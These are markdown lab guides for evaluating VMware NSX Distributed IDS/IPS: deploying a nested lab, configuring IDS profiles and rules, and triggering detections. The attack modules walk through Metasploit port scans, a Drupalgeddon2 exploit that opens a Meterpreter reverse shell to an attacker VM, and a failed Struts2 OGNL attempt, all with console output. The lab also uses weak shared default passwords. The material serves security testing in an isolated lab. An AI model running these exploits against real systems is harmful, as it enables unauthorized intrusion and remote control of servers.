57 | ---
58 |
59 | [***Next Step: 2. Customize Deployment Script***](/docs/2-CustomizeScript.md)
60 |
--------------------------------------------------------------------------------
/docs/10-Conclusion.md:
--------------------------------------------------------------------------------
1 | ## Conclusion
2 | Congratulations, you have now completed the NSX Distributed IDS/IPS lab/evaluation!
3 |
4 | Throughout this process, you should have disovered the unique benefits of having IDS/IPS built-in to the infrastructure versus bolted-on securitry controls.
5 | Please reach out to your VMware NSX representative with any feedback you have about the product or about the evaluation Process.
6 |
7 | ## Additional Resources
8 | To learn more about the NSX Distributed IDS/IPS, check out the below resources:
9 | * [NSX Distributed IDS/IPS Overview page](https://www.vmware.com/products/nsx-distributed-ids-ips.html)
10 | * [NSX Service Defined Firewall Overview page](https://www.vmware.com/security/internal-firewall.html)
11 | * [Lightboard: Overview of the NSX Distributed IDS/IPS](https://www.youtube.com/watch?v=WUpq1kNfKB8)
12 | * [Demo: NSX Distributed IDS/IPS](https://www.youtube.com/watch?v=AGiwV9XsDk0)
13 | * [Demo: NSX Distributed IDS/IPS - Real-time threat detection interface and logging](https://www.youtube.com/watch?v=iaSgDUjhI-U)
14 | * [Demo: NSX Distributed IDS/IPS - Ransomware](https://www.youtube.com/watch?v=aFfhDRWk6n8)
15 | * [Demo: NSX Distributed IDS/IPS - Secure VDI](https://www.youtube.com/watch?v=24fF3iQhAOA)
16 |
17 |
--------------------------------------------------------------------------------
/docs/2-CustomizeScript.md:
--------------------------------------------------------------------------------
1 |
2 | ## 2. Customize Deployment Script Variables
3 | **Estimated Time to Complete: 60 minutes**
4 |
5 | Before you can run the [script](https://github.com/vmware-nsx/eval-docs-ids-ips/blob/master/Nested%20Lab%20Deployment.ps1), you will need to [download](https://github.com/vmware-nsx/eval-docs-ids-ips/blob/master/Nested%20Lab%20Deployment.ps1) and edit the script and update a number of variables to match your deployment environment. Details on each section is described below including actual values used my sample lab environment. The variables that need to adjusted are called out specifically. Other variables can in almost all cases be left to their default values.
6 |
7 | In this example below, I will be using a single /27 subnet(10.114.209.128/27) on a single port-group (VLAN-194) which all the VMs provisioned by the automation script will be connected to. It is expected that you will have a similar configuration which is the most basic configuration for PoV and testing purposes.
8 |
9 | | Name | IP Address | Function | Default Credentials |
10 | |----------------------------|--------------------------------|------------------------------|------------------------------|
11 | | pov-vcsa | 10.114.209.143 | vCenter Server |administrator@vsphere.local/VMware1! |
12 | | Nested_ESXi_1 | 10.114.209.140 | ESXi |root/VMware1!
13 | | Nested_ESXi_2 | 10.114.209.141 | ESXi |root/VMware1!
14 | | Nested_ESXi_3 | 10.114.209.142 | ESXi |root/VMware1!
15 | | pov-nsx | 10.114.209.149 | NSX-T Manager |admin/VMware1!VMware1!
16 | | pov-nsx-edge | 10.114.209.150 | NSX-T Edge |admin/VMware1!
17 | | T0-uplink | 10.114.209.148 | T0 GW Interface IP |n.a.
18 | | TunnelEndpointGateway | 10.114.209.129 | Existing default GW |n.a.
19 | | T0 Static Default GW | 10.114.209.129 | Existing default GW |n.a.
20 | | TEP Pool | 10.114.209.144-10.114.209.147 | Tunnel Endpoint IPs |n.a.
21 | | External VM | 10.114.209.151 | Attacker (Metasploit) VM |vmware/VMware1!
22 |
23 | > **Note:** The remainder of this page contains the sections and variables within the script that should be modified to match the parameters of your environment. Other sections and variables within the script should be left at their pre-configured defaults.
24 |
25 | This section describes the credentials to your physical environment vCenter Server in which the nested lab environment will be deployed to. Make sure to adjust **all** of the below variables to match your physical environment vCenter:
26 | ```console
27 | # vCenter Server used to deploy vSphere with NSX lab
28 | $VIServer = "vcenter-north.lab.svanveer.pa"
29 | $VIUsername = "administrator@vsphere.local"
30 | $VIPassword = "VMware1!"
31 | ```
32 |
33 | This section describes the location of the files required for deployment. This includes the OVAs for ESXi, NSX Manager and NSX Edge, the extracted bundle for vCenter and OVAs for the external and victim VMs. Update the below variables with the actual **location of the downloaded OVAs/extracted files** on the local machine you run this PowerShell script from
34 |
35 | ```console
36 | # Full Path to both the Nested ESXi 7.0 VA, Extracted VCSA 7.0 ISO, NSX-T OVAs, External and Victim VM OVAs
37 | $NestedESXiApplianceOVA = "C:\Users\stijn\downloads\ESXI\Nested_ESXi7.0_Appliance_Template_v1.ova"
38 | $VCSAInstallerPath = "C:\Users\stijn\downloads\VCSA\VMware-VCSA-all-7.0.0-16189094"
39 | $NSXTManagerOVA = "C:\Users\stijn\downloads\NSXMgr\nsx-unified-appliance-3.0.0.0.0.15946739.ova"
40 | $NSXTEdgeOVA = "C:\Users\stijn\downloads\NSXEdge\nsx-edge-3.0.0.0.0.15946012.ova"
41 | $ExternalVMOVA = "C:\Users\stijn\downloads\Attacker\External-VM.ova"
42 | $VictimVMOVA = "C:\Users\stijn\downloads/Victim\Victim-VM.ova"
43 | ```
44 | > **Note:** The path to the VCSA Installer must be the extracted contents of the ISO
45 |
46 |
47 | This section defines the number of Nested ESXi VMs to deploy along with their associated IP Address(s). The names are merely the display name of the VMs when deployed. At a minimum, you should deploy at least three hosts, but you can always add additional hosts and the script will automatically take care of provisioning them correctly. Adjust the **IP addresses** for the 3 below hosts. For simplicity, these IP addresses should part of the same Management subnet for the nested vCenter and NSX Manager.
48 | ```console
49 | # Nested ESXi VMs to deploy - Replace IP addresses (nested ESXi VMMKnic) to match the assigned subnet in your physical eenvironment
50 | $NestedESXiHostnameToIPs = @{
51 | "Nested_ESXi_1" = "10.114.209.140"
52 | "Nested_ESXi_2" = "10.114.209.141"
53 | "Nested_ESXi_3" = "10.114.209.142"
54 | }
55 | ```
56 |
57 | This section describes the VCSA deployment configuration such as the VCSA deployment size, Networking & SSO configurations. If you have ever used the VCSA CLI Installer, these options should look familiar. Adjust the **IP address** and **Prefix (Subnet Mask Bits)** to match the desired IP address of the nested ESXi. Use the Same IP address as the **hostname**, unless you can add an FQDN entry to your DSN server.
58 | ```console
59 | $VCSADeploymentSize = "tiny"
60 | $VCSADisplayName = "pov-vcsa"
61 | $VCSAIPAddress = "10.114.209.143" #Set to the desired IP address
62 | $VCSAHostname = "10.114.209.143" #Use IP if you don't have valid DNS.
63 | $VCSAPrefix = "27" #Set to the appropriate prefix
64 | $VCSASSODomainName = "vsphere.local"
65 | $VCSASSOPassword = "VMware1!"
66 | $VCSARootPassword = "VMware1!"
67 | $VCSASSHEnable = "true"
68 | ```
69 |
70 | This section describes the physical location as well as the generic networking settings applied to Nested ESXi VCSA & NSX VMs. The following variable should be defined by users **VMDataceter**, **VMCluster**, **VMNetwork** and **VMdatastore**. Replace all the **IP addresses** and **netmaks** with the appropriate IP addresses/netmask to match your phyiscal environment. For the other values, default values are sufficient.
71 | ```console
72 | $VMDatacenter = "PaloAlto-Main" # Existing Datacenter on the Physical vCenter
73 | $VMCluster = "Physical-3" #Existing Cluster in the above Datacenter on the Physical vCenter
74 | $VMNetwork = "VLAN-194" #Existing port-group on the physical host/ to use and connect all deployed workloads (except for victim VMs) to
75 | $VMDatastore = "NFS" #Existing Datastore on the physical host/vCenter
76 | $VMNetmask = "255.255.255.224" #Netmask of the designated existing subnet which will be used to connect all deployed workloads (except for victim VMs) to
77 | $VMGateway = "10.114.209.129" #Existing Gateway allowing lab management components to reach the outside environment
78 | $VMDNS = "10.114.222.70" #Existing DNS server that will be configured on lab management componenets
79 | $VMNTP = "10.20.145.1" #Existing NTP server that will be configured on lab management components
80 | $VMPassword = "VMware1!"
81 | $VMDomain = "lab.svanveer.pa"
82 | $VMSyslog = "" # Do not set this unless you want to send logs to an existing and reachable Syslog collector/SIEM.
83 | $VMFolder = "NSX PoV" #The deployment script will create this folder
84 | ```
85 |
86 | This section describes the NSX-T configurations, the following variables must be defined by users and the rest can be left as defaults.
87 | **$NSXLicenseKey**, **$NSXVTEPNetwork**, **$T0GatewayInterfaceAddress**, **$T0GatewayInterfacePrefix**, **$T0GatewayInterfaceStaticRouteAddress** and the **NSX-T Manager**, **TEP IP Pool** and **Edge** Sections
88 | ```console
89 | # NSX-T Configuration - Adjust variables (license key, VTEPNetwork) to match your environment
90 | NSXLicenseKey = "xxxxx-xxxxx-xxxxx-xxxxx-xxxxx" #Replace with valid NSX License key
91 | $NSXRootPassword = "VMware1!VMware1!"
92 | $NSXAdminUsername = "admin"
93 | $NSXAdminPassword = "VMware1!VMware1!"
94 | $NSXAuditUsername = "audit"
95 | $NSXAuditPassword = "VMware1!VMware1!"
96 | $NSXSSHEnable = "true"
97 | $NSXEnableRootLogin = "true"
98 | $NSXVTEPNetwork = "VLAN-194" # Replace with the appropriate pre-existing port-group
99 |
100 | # TEP IP Pool - Replace IP addresses to match the physical environment subnet you've allocated (i.e management network)
101 | $TunnelEndpointName = "TEP-IP-Pool"
102 | $TunnelEndpointDescription = "Tunnel Endpoint for Transport Nodes"
103 | $TunnelEndpointIPRangeStart = "10.114.209.144"
104 | $TunnelEndpointIPRangeEnd = "10.114.209.147"
105 | $TunnelEndpointCIDR = "10.114.209.128/27"
106 | $TunnelEndpointGateway = "10.114.209.129" #Default Gateway of the Management Network
107 |
108 | # T0 Gateway - Adjust T0GatewayInterfaceAddress and Prefix as well as StaticRoute Address
109 | $T0GatewayName = "PoV-T0-Gateway"
110 | $T0GatewayInterfaceAddress = "10.114.209.148" # should be a routable address
111 | $T0GatewayInterfacePrefix = "27" #adjust to the correct prefix for your enviornment
112 | $T0GatewayInterfaceStaticRouteName = "PoV-Static-Route"
113 | $T0GatewayInterfaceStaticRouteNetwork = "0.0.0.0/0"
114 | $T0GatewayInterfaceStaticRouteAddress = "10.114.209.129" # IP address of the next hop router in your environment. This can be set to an invalid IP address to ensure the vulnerable workloads remain isolated from the rest of the environment
115 |
116 | # NSX-T Manager Configurations - Replace IP addresses
117 | $NSXTMgrDeploymentSize = "small"
118 | $NSXTMgrvCPU = "4"
119 | $NSXTMgrvMEM = "16"
120 | $NSXTMgrDisplayName = "pov-nsx-manager"
121 | $NSXTMgrHostname = "10.114.209.149" # Replace with the desired IP address for the NSX Manager
122 | $NSXTMgrIPAddress = "10.114.209.149" # Replace with the desired IP address for the NSX Manager
123 |
124 | # NSX-T Edge Configuration
125 | $NSXTEdgeDeploymentSize = "medium"
126 | $NSXTEdgevCPU = "4"
127 | $NSXTEdgevMEM = "8"
128 | $NSXTEdgeName = "poc-nsx-edge"
129 | $NSXTEdgeHostnameToIPs = @{
130 | $NSXTEdgeName = "10.114.209.150" #Replace with the desired IP address for the NSX Edge Management Interface
131 |
132 | }
133 | ```
134 |
135 | ---
136 |
137 | [***Next Step: 3. Run Deployment Script***](/docs/3-RunScript.md)
138 |
--------------------------------------------------------------------------------
/docs/3-RunScript.md:
--------------------------------------------------------------------------------
1 | ## 3. Run Deployment Script
2 | **Estimated Time to Complete: 90 minutes**
3 | Once you have saved your changes, you can now run the PowerCLI script as you normally would.
4 |
5 | Here is a screenshot of running the script if all basic pre-reqs have been met and the confirmation message before starting the deployment:
6 | 
7 |
8 | Once the deployment completes, you will receive a confirmation and can now move on with the next step:
9 | 
10 |
11 |
12 | > **Note**: Deployment time will vary based on underlying physical infrastructure resources. On average, it can take between 45 minutes to 90 minutes.
13 |
14 | ---
15 |
16 | [***Next Step: 4. Verify Lab Deployment***](/docs/4-VerifyDeployment.md)
17 |
--------------------------------------------------------------------------------
/docs/4-VerifyDeployment.md:
--------------------------------------------------------------------------------
1 |
2 | ## 4. Verify Lab Deployment
3 | **Estimated Time to Complete: 30 minutes**
4 |
5 | Once the Deployment Script has completed the installation and setup process. Your lab environment is fully ready to start testing the NSX Distributed IDS/IPS. Verify vCenter and NSX has been configured as intended.
6 |
7 | **Physical Infrastructure Host/vCenter**
8 |
9 | 
10 |
11 | **Logical Nested Lab**
12 | 
13 |
14 | **Validate VM Deployment in the physical Environment**
15 |
16 | Login to the physial environment vcenter and Verify 6 VMs have been deployed, are up and running and are connected to the appropriate port-group:
17 | * 3 nested ESXI
18 | * 1 NSX Manager
19 | * 1 NSX Edge
20 | * 1 vCenter
21 | * 1 External VM
22 |
23 | 
24 |
25 | Confirm you are able to ping each nested ESXi, the Lab NSX Manager and the Lab vCenter.
26 |
27 | **Configure IP address and static route on the External VM**
28 |
29 | 
30 |
31 | You will need to manually change the IP address of the external VM to an IP address in the same managment subnet you used for vCenter/NSX Manager and the rest of the environment. You will also need to adjust the static route so the external VM is able to reach the DMZ subnet inside the nested lab environemnt. There is no need for a default gateway to be configured as the only route the external VM needs is to the DMZ segment.
32 |
33 | From the physical environent vCenter, open a console to **External VM** and take the following steps:
34 | * Login with **vmware**/**VMware1!**
35 | * Type **sudo nano /etc/network/interfaces** to open the network configuration file
36 | 
37 | * For interface **ens160** change the **address** and **netmask** to match the appropriate settings for your enviornment
38 | * In the line that stats with **up route add**, change the **gw address** (10.114.209.148 in my example) to the **T0 Uplink interface IP address**
39 | * Type **^O** (**Control-O**) to save the changes in Nano.
40 | * Type **^X** (**Control-X**) to exit Nano.
41 | * Type **sudo ip addr flush ens160** to clear the previously set IP address
42 | * Type **sudo systemctl restart networking.service** to restart the networking service and realize the new IP address.
43 |
44 | **Verify Nested Lab vCenter**
45 |
46 | Login to lab vCenter and verify the cluster of 3 nested ESXi appliances is functional and 4 vulnerable VMs have been deployed on the cluster:
47 | * APP-1-WEB-TIER connected to **DMZSegment** Portgroup
48 | * APP-2-WEB-TIER connected to **DMZSegment** Portgroup
49 | * APP-1-APP-TIER connected to **InternalSegment** Portgroup
50 | * APP-2-APP-TIER connected to **InternalSegment** Portgroup
51 |
52 | 
53 |
54 | **Verify Network Segmenets were created**
55 |
56 | 1. Login to the Lab NSX Manager Web-UI.
57 | 2. In the NSX Manager UI, navigate to Networking --> Segments --> Segments
58 | 3. Verify 3 segmetns have been deployed
59 | * **DMZSegment** - Overlay-based semgnet connecting the Web-tier workloads
60 | * **InternalSegment** - OVerlay-based semgent connecting the App-tier workloads
61 | * **PoC-Segment** - VLAN-backed segment providing uplink and management connectivity
62 |
63 | 
64 |
65 | **Determine the IP address of every nested workload**
66 |
67 | 1. In the NSX Manager UI, navigate to Inventory --> Virtual Machines
68 | 2. Click **View Details**
69 | 3. Note the IP addresses for the 4 VMs that were deployed. You will need to what IP address has been assigned to every workloads in the next exercises.
70 |
71 | 
72 | 
73 |
74 | > **Note**: DHCP Server has been pre-configured on NSX and should be assigning an IP address to each of the deployed nested workloads on the DMZ and Internal segments.
75 |
76 |
77 | **Confirm NAT configuration**
78 |
79 | 
80 |
81 | 1. In the NSX Manager UI, nativate to Networking --> NAT
82 | 2. Confirm a single **SNAT** rule exists, with the **Internal Subnet** as a source, and the **T0 Uplink** IP address as the translated address (10.114.209.148 in my example).
83 |
84 | 
85 |
86 | > **Note**: This NAT rule enables internal VMs to initiate communcation with the outside world.
87 |
88 |
89 | **Confirm TAG Creation and Application**
90 |
91 | 
92 |
93 | 1. In the NSX Manager UI, nativate to Inventory --> Tags
94 | 2. Confirm 6 tags have been added as per below sceenshot
95 | 
96 | 3. Confirm tags were applied to workloads as per the above diagram
97 |
98 | This completes Lab Deployment Verification. You can now move to the next exercise.
99 |
100 | ---
101 |
102 | [***Next Step: 5. Initial IDS/IPS Configuration***](/docs/5-InitialConfiguration.md)
103 |
--------------------------------------------------------------------------------
/docs/5-InitialConfiguration.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | ## 5. Initial IDS/IPS Configuration
4 | **Estimated Time to Complete: 30 minutes**
5 |
6 | > **Note**: If you are running though this PoV/Evaluation process using a VMWare hosted (OneCloud/HoL) environment, you can skip all the previous modules and start with this lab module (5), as everything has already been deployed.
7 |
8 | Now that we have verified the lab has been deployed correctly, basic NSX networking configuration has been applied and the appropriate vunlerable application VMs have been deployed, we can configure the NSX Distributed IDS/IPS.
9 |
10 | **Create Groups**
11 | 1. In the NSX Manager UI, navigate to Inventory --> Groups
12 | 2. Click **ADD GROUP**
13 | 3. Create a Group with the below parameters. Click Save when done.
14 | * Name **Production Applications**
15 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals Production Scope Environment**
16 | 
17 | 3. Create another Group with the below parameters. Click Save when done.
18 | * Name **Development Applications**
19 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals Development Scope Environment**
20 | 
21 | 4. Confirm previously deployed VMs became a member of appropriate groups due to applied tags. Click **View Members** for the 2 groups you created and confirm
22 | * Members of **Development Applications**: **APP-2-APP-TIER**, **APP-2-WEB-TIER**
23 | * Members of **Production Applications**: **APP-1-APP-TIER**, **APP-1-WEB-TIER**
24 | 
25 |
26 | > **Note**: Tags were applied to the workloads through the Powershell script used to deploy the lab environment.
27 |
28 | **Enable Intrusion Detection**
29 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS --> Settings
30 | 2. Under Enable Intrusion Detection for Cluster(s), set **Workload-Cluster** to Enabled
31 |
32 | 
33 |
34 | NSX can automatically update it’s IDS signatures by checking our cloud-based service. By default, NSX manager will check once per day and we publish new signature update versions every two week (with additional non-scheduled 0-day updates). NSX can also be configured to optionally automatically apply newly updated signatures to all hosts that have IDS enabled.
35 |
36 | **Enable Automated Signature Update propagation**
37 | 1. Under Intrusion Detection Signatures, select **Auto Update new versions (recommended)** in order to propagate the latest signature updates from the cloud to the distributed IDS instances
38 | 2. Optionally, click **View and Change Versions** and expand one of the signature sets to see what signatures have been added/updated/disabled in this particular release
39 |
40 | > **Note**: if a proxy server is configured for NSX Manager to access the internet, click Proxy Settings and complete the configuration
41 |
42 |
43 | **Create IDS Profiles**
44 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS --> Profiles
45 | 2. Click **ADD IDS PROFILE**
46 | 3. Create an IDS Profile with the below parameters. Click Save when done.
47 | * Name **Production**
48 | * Signatures to Include: **Critical**, **High**, **Medium**
49 | 3. Create another IDS Profile with the below parameters. Click Save when done.
50 | * Name **Development**
51 | * Signatures to Include: **Critical**, **High**
52 |
53 | 
54 |
55 | **Create IDS Rules**
56 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS --> Rules
57 | 2. Click **ADD POLICY**
58 | 3. Create an IDS Policy named **NSX PoV** .
59 | 4. Check the checkbox for the policy you just created and click **ADD RULE**.
60 | 5. Add an IDS Rule with the following parameters
61 | * Name **Production Applications IDS Policy**
62 | * IDS Profile **Production**
63 | * Applied to **Production Applicatons** (group)
64 | * Leave other settings to defaults
65 | 6. Add another IDS Rule with the following parameters
66 | * Name **Development Applications IDS Policy**
67 | * IDS Profile **Development**
68 | * Applied to **Development Applicatons** (group)
69 | * Leave other settings to defaults
70 | 7. Click **Publish**
71 |
72 | 
73 |
74 | You have now successfully configured the NSX Distributed IDS/IPS ! In the next exercise, we will run through a basic attack scenario to confirm intrusion attemtps are detected and get familair with the NSX IDS/IPS Events view.
75 |
76 | ---
77 |
78 | [***Next Step: 6. Basic Attack Scenario***](/docs/6-BasicAttackScenario.md)
79 |
--------------------------------------------------------------------------------
/docs/6-BasicAttackScenario.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | ## 6. Basic Attack Scenario
4 | **Estimated Time to Complete: 30 minutes**
5 |
6 | In this exercise, we will use **Metasploit** to launch a simple exploit against the **Drupal** service runnning on the **App1-WEB-TIER VM** and confirm the NSX Distributed IDS/IPS was able to detect this exploit attempt.
7 |
8 | 
9 |
10 | **Open a SSH/Console session to the External VM**
11 | 1. If your computer has access to the IP address you've assigend to the **External VM** (10.114.209.151 in my example), open your ssh client and initiate a session to it. Login with the below credentials.
12 | * Username **vmware**
13 | * Password **VMware1!**
14 | 2. **Alternatively**, if your computer does not have access to the **External VM** directly, you can access the VM console from the physical environment vCenter Web-UI.
15 |
16 | **Initiate port-scan against the DMZ Segment**
17 | 1. Type **sudo msfconsole** to launch **Metasploit**. Follow the below steps to initiate a portscan and discover any running services on the **DMZ** subnet. Hit **enter** between every step.
18 | * Type **use auxiliary/scanner/portscan/tcp** to select the portscan module
19 | * Type **set THREADS 50**
20 | * Type **set RHOSTS 192.168.10.0/24** to define the subnets to scan. These should match the **DMZ** Subnet
21 | * Type **set PORTS 8080,5984** to define the ports to scan (Drupal and CouchDB servers)
22 | * Type **run**
23 |
24 | ```console
25 | vmware@ubuntu:~$sudo msfconsole
26 |
27 | IIIIII dTb.dTb _.---._
28 | II 4' v 'B .'"".'/|\`.""'.
29 | II 6. .P : .' / | \ `. :
30 | II 'T;. .;P' '.' / | \ `.'
31 | II 'T; ;P' `. / | \ .'
32 | IIIIII 'YvP' `-.__|__.-'
33 |
34 | I love shells --egypt
35 |
36 |
37 | =[ metasploit v5.0.95-dev ]
38 | + -- --=[ 2038 exploits - 1103 auxiliary - 344 post ]
39 | + -- --=[ 562 payloads - 45 encoders - 10 nops ]
40 | + -- --=[ 7 evasion ]
41 |
42 | Metasploit tip: Tired of setting RHOSTS for modules? Try globally setting it with setg RHOSTS x.x.x.x
43 | msf5 > use auxiliary/scanner/portscan/tcp
44 | msf5 auxiliary(scanner/portscan/tcp) > set THREADS 50
45 | THREADS => 50
46 | msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.10.0/24
47 | RHOSTS => 192.168.10.0/24, 192.168.20.0/24
48 | msf5 auxiliary(scanner/portscan/tcp) > set PORTS 8080,5984
49 | PORTS => 8080,5984
50 | msf5 auxiliary(scanner/portscan/tcp) > run
51 | ```
52 | 2. You should see the below results when the scan completes
53 | ```console
54 | [*] 192.168.10.0/24: - Scanned 28 of 256 hosts (10% complete)
55 | [*] 192.168.10.0/24: - Scanned 52 of 256 hosts (20% complete)
56 | [+] 192.168.10.100: - 192.168.10.100:5984 - TCP OPEN
57 | [+] 192.168.10.100: - 192.168.10.100:8080 - TCP OPEN
58 | [+] 192.168.10.101: - 192.168.10.101:5984 - TCP OPEN
59 | [+] 192.168.10.101: - 192.168.10.101:8080 - TCP OPEN
60 | [*] 192.168.10.0/24: - Scanned 77 of 256 hosts (30% complete)
61 | [*] 192.168.10.0/24: - Scanned 103 of 256 hosts (40% complete)
62 | [*] 192.168.10.0/24: - Scanned 129 of 256 hosts (50% complete)
63 | [*] 192.168.10.0/24: - Scanned 154 of 256 hosts (60% complete)
64 | [*] 192.168.10.0/24: - Scanned 180 of 256 hosts (70% complete)
65 | [*] 192.168.10.0/24: - Scanned 205 of 256 hosts (80% complete)
66 | [*] 192.168.10.0/24: - Scanned 233 of 256 hosts (91% complete)
67 | [*] 192.168.10.0/24: - Scanned 256 of 256 hosts (100% complete)
68 | [*] Auxiliary module execution completed
69 | ```
70 |
71 | > **Note**: To reduce the number of OVAs needed for this PoV, each workload VM deployed runs both a vulnerable **Drupal** and a vulnerable **CouchDB** service
72 |
73 | **Initiate DrupalGeddon2 attack against App1-WEB-TIER VM**
74 |
75 | In order to launch the **Drupalgeddon2** exploit against the **App1-WEB-TIER VM**, you can either manually configure the **Metasploit** module, or edit and run a pre-defined script. If you want to go with the script option, skip to step #3 and continue from there.
76 |
77 | 1. To initiate the attack manually, use the Metasploit console you opened earlier. Follow the below steps to initiate the exploit. Hit **enter** between every step.
78 | * Type **use exploit/unix/webapp/drupal_drupalgeddon2** to select the drupalgeddon2 exploit module
79 | * Type **set RHOST 192.168.10.101** to define the IP address of the victim to attack. The IP address should match the IP address of **App1-WEB-TIER VM**
80 | * Type **set RPORT 8080** to define the port the vulnerable Drupal service runs on.
81 | * Type **exploit** to initiate the exploit attempt
82 | 2. Skip step #3 and #4, and continue with step #5
83 |
84 | ```console
85 |
86 | msf5 auxiliary(scanner/portscan/tcp) > use exploit/unix/webapp/drupal_drupalgeddon2
87 | [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
88 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOST 192.168.10.101
89 | RHOST => 192.168.10.101
90 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 8080
91 | RPORT => 8080
92 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
93 | ```
94 | 3. If you want to go with the script option instead, run **sudo nano attack1.rc** and type **VMware1!** when asked for the password.
95 | * Confirm that the **RHOST** line IP address matches with the IP address of **App1-WEB-TIER VM** you saw in the NSX VM Inventory.
96 | * Change this IP address if needed.
97 | * Save your changes and exit **nano**
98 | 4. Type **sudo ./attack1.sh** to initiate the Metasploit script and Drupalgeddon exploit. Next, go to step #6
99 |
100 | 5. Confirm the vulnerable server was sucessfully exploited and a **Meterpreter** reverse TCP session was established from **App1-WEB-TIER VM** back to the **Extermal VM**
101 |
102 | ```console
103 | [*] Started reverse TCP handler on 10.114.209.151:4444
104 | [*] Sending stage (38288 bytes) to 192.168.10.101
105 | [*] Meterpreter session 1 opened (10.114.209.151:4444 -> 192.168.10.101:45032) at 2020-07-20 19:37:29 -0500
106 | ```
107 | 6. **Optionally**, you can now interact with the Meterpreter session. For instance, you can run the below commands to gain more inforation on the exploited **App1-WEB-TIER VM**
108 | * Type **sysinfo** to learn more about the running OS
109 |
110 | ```console
111 | meterpreter > sysinfo
112 | Computer : 273e1700c5be
113 | OS : Linux 273e1700c5be 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64
114 | Meterpreter : php/linux
115 | meterpreter > ?
116 | ```
117 | 7. When you are done, type **exit -z** to shut down the Meterpreter session
118 | 8. Type **exit** to exit Metasploit
119 |
120 | **Confirm IDS/IPS Events show up in the NSX Manager UI**
121 | 1. In the NSX Manager UI, navigate to Security --> Security Overview
122 | 2. Under the **Insights** tab, confirm you see a number of attempted intrusion against the **APP-1-WEB-TIER** workload
123 | 
124 | 3. Click **APP-1-WEB-TIER** to open a filtered event view for this workload.
125 | 4. Confirm 2 signatures have fired; one exploit-specific signature for **DrupalGeddon2** and one broad signature indicating the use of a **Remote Code execution via a PHP script**
126 | 
127 | > **Note**: You can zoom in/out to specific times using the timeline slider, filter the Events view based on Severity by selecting the desired severities or filter based on other criteria such as Attacker Target, Attack Type, CVSS, Product Affected or VM Name by using the **Appl Filter** box.
128 | 5. Expand both of the events by clicking the **>** icon on the left side next to severity
129 | 6. For the **DruppalGeddon2** event:
130 | * Confirm that the IP addresses of the attacker and victim match with the **External VM** and **APP-1-WEB-TIER VM** respectlively.
131 | * click **View Intrusion History** to see details about the exploit attempts. You may see multiple attemts (from different ports) as Metasploit initiated multiple connections
132 | * this event contains vulnerability details including the **CVSS score** and **CVE ID**. Click the **2018-7600** CVE link to open up the **Mittre** CVE page and learn more about the vulnerability.
133 | 7. **Optionally**, you can check the obove details as well for the secondary event (except for the vulnerability details, which are not applicable to this more general signature)
134 |
135 | > **Note**: **Product Affected** incicates the service vulnerable to the exploit a signature is detecting. In this case, you should see **Drupal_Server** as being vulnerable to the **DruppalGeddon2** exploit and **Web_server_Applications** being affected by the more generic **Remote Code Execution** attmept.
136 |
137 | > **Note**: **Attack Target** incicates the kind of service being attacked. This could be a client (in case of a client-side exploit), server, etc. In this case, you should see **Web_server** as the attack target for both events.
138 |
139 | 8. In the **timeline** above, you can click the dots that represent each event to get summarized information.
140 |
141 | You have now successfully completed a simple attack scenario !
142 | In the next exercise, we will run through a more advanced scenario, in which will move the attack beyond the initial exploit against the Drupal web-frontend to a database server running on the internal network and then moving laterally once again to another database server beloging to a different application. This is similar to real-world attacks in which bad actors move within the network in order to get to the high value asset/data they are after. The NSX Distributed IDS/IPS and Distributed Firewall are uniquely positioned at te vNIC of every workload to detect and prevent this lateral movement.
143 |
144 |
145 | Before moving to the next exercise, folow [these instructions](/docs/ClearingIDSEvents.md) to clear the IDS events from NSX Manager
146 |
147 | ---
148 |
149 | [***Next Step: 7. Lateral Movement Scenario***](/docs/7-LateralMovementScenario.md)
150 |
--------------------------------------------------------------------------------
/docs/8-AdvancedConfiguration-302.md:
--------------------------------------------------------------------------------
1 |
2 | ## 8. Advanced Attack and Configuration
3 | **Estimated Time to Complete: 60 minutes**
4 |
5 | In this **optional** exercise, we will explore some more advanced options in the NSX Distributed IDS/IPS Configuration
6 | * Tuning IDS/IPS Profile to turn off irrelevant signatures
7 | * Enable IDS/IPS event logging directly from each host to a syslog collector/SIEM
8 |
9 | **Tuning IDS/IPS Profile to turn off irrelevant signatures**
10 |
11 | > **Note**: Within an IDS/IPS Profile, you can define exclusions in order to turn off particular signatures within the context of that profile. Reasons to exclude signatures include false positives, noisy or irrelevant signatures being triggered.
12 |
13 | 1. From the console session with **External VM**, type **sudo msfconsole** to launch **Metasploit**. Enter **VMware1!** if prompted for a password. Follow the below steps to initiate the exploit. Hit **enter** between every step.
14 | * Type **use exploit/multi/http/struts2_namespace_ognl** to select the drupalgeddon2 exploit module
15 | * Type **set RHOST 192.168.10.101** to define the IP address of the victim to attack. The IP address should match the IP address of **App1-WEB-TIER VM**
16 | * Type **exploit** to initiate the exploit.
17 |
18 | > **Note**: This exploit will fail as **App1-WEB-TIER VM** is not running an Apache Struts service vulnerable to this exploit.
19 |
20 | ```console
21 | msf5 > use exploit/multi/http/struts2_content_type_ognl
22 | [*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
23 | msf5 exploit(multi/http/struts2_content_type_ognl) > set RHOST 192.168.10.101
24 | RHOST => 192.168.10.101
25 | msf5 exploit(multi/http/struts2_content_type_ognl) > set RHOST 192.168.10.101
26 | RHOST => 192.168.10.101
27 | msf5 exploit(multi/http/struts2_content_type_ognl) > exploit
28 |
29 | [*] Started reverse TCP handler on 10.114.209.151:4444
30 | [-] Exploit aborted due to failure: bad-config: Server returned HTTP 404, please double check TARGETURI
31 | [*] Exploit completed, but no session was created.
32 | msf5 exploit(multi/http/struts2_content_type_ognl) >
33 | ```
34 | 2. In NSX Manager, navigate to Security --> East West Security --> Distributed IDS --> Events
35 | 3. Confirm 3 signatures have fired:
36 | * ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638)
